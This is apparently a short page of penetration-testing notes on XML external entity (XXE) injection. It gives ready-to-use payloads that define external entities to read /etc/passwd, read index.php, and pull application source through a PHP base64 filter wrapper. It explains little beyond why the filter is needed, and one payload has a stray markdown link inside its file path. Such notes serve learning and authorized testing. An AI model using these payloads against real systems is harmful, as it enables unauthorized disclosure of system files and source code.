read-files

Read sensitive files

Let's define external XML entities

<!DOCTYPE email [
  <!ENTITY company SYSTEM "[file:///etc/passwd](file://etc/passwd)">
]>
&company;

In certain java web application, we may also define a specific directory.

Reading source code

Another benefit of local file disclosure is the ability to obtain the source code of the web application.

<!DOCTYPE email [
  <!ENTITY company SYSTEM "file:///index.php">
]>

The command can execute successfully but we may not see any result because the file we are referencing is not in a proper XML format, so it fails to be referenced as the external XML entity.

In this case we can use "PHP Filters/wrapper"

<!DOCTYPE email [
  <!ENTITY file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
&file;

Previousidentifying Nextxxe-external-entity-injection

Last updated 1 day ago

hashtagRead sensitive files

hashtagReading source code

Read sensitive files

Reading source code